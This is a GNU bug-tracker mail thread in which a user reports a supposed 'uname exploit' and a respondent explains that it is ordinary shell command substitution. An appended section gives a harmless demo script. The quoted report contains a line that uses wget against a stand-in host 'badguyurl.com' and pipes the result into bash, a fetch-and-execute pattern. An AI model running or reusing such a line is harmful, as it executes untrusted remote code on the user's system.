bug#24328: uname exploit
From: Evan J Johnson
Subject: bug#24328: uname exploit
Date: Mon, 29 Aug 2016 08:47:22 -0700
Hey Shane,
I'm no bash/systems/coreutils expert, but I believe this behavior is
completely expected, independent of uname, and documented.
$(...) is the command substitution syntax and it will cause the command
inside the parens to be run, with the output used as input. Here's a
link to the behavior on gnu.org.
https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution
It won't work if you use single quotes, which is also expected.
Evan
On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote:
> Hi, I am unsure if you have seen this, but I am concerned about this -
> can or should uname be restricted to root use only?
>
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
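What the reply describes, as an added example that is not part of the original thread: the shell performs the command substitution before the program named on the command line starts, so the result is the same for any command, and single quotes pass the text through literally. `show_argv` (a stand-in for uname) and `side_effect` (a harmless stand-in for the substituted command) are hypothetical helpers constructed for this demo.

```shell
#!/bin/sh
# Constructed demo: who runs $(...), the shell or the program being called?

marker_dir=$(mktemp -d)
trap 'rm -rf "$marker_dir"' EXIT

# Harmless stand-in for the substituted command (hypothetical helper).
# It leaves a marker file so we can tell whether it was executed.
side_effect() {
    : > "$marker_dir/ran"
    echo payload-output
}

# Stand-in for uname or any other program (hypothetical helper):
# it only echoes back the single argument it was handed.
show_argv() {
    printf '%s' "$1"
}

# True if the substituted command was executed since the last reset.
ran() {
    [ -e "$marker_dir/ran" ]
}

# Double quotes: the shell runs side_effect first, then passes its
# output to the program as an ordinary argument.
double_quoted() {
    rm -f "$marker_dir/ran"
    show_argv "$(side_effect)"
}

# Single quotes: no substitution; the program receives the literal text.
single_quoted() {
    rm -f "$marker_dir/ran"
    show_argv '$(side_effect)'
}

report() {
    out=$("$1")
    if ran; then state=yes; else state=no; fi
    printf '%-14s argv=[%s] substituted command ran: %s\n' "$1" "$out" "$state"
}

report double_quoted
report single_quoted
```

Because the substitution happens in the caller's shell with the caller's privileges, restricting who may run the program on the command line does not change the outcome.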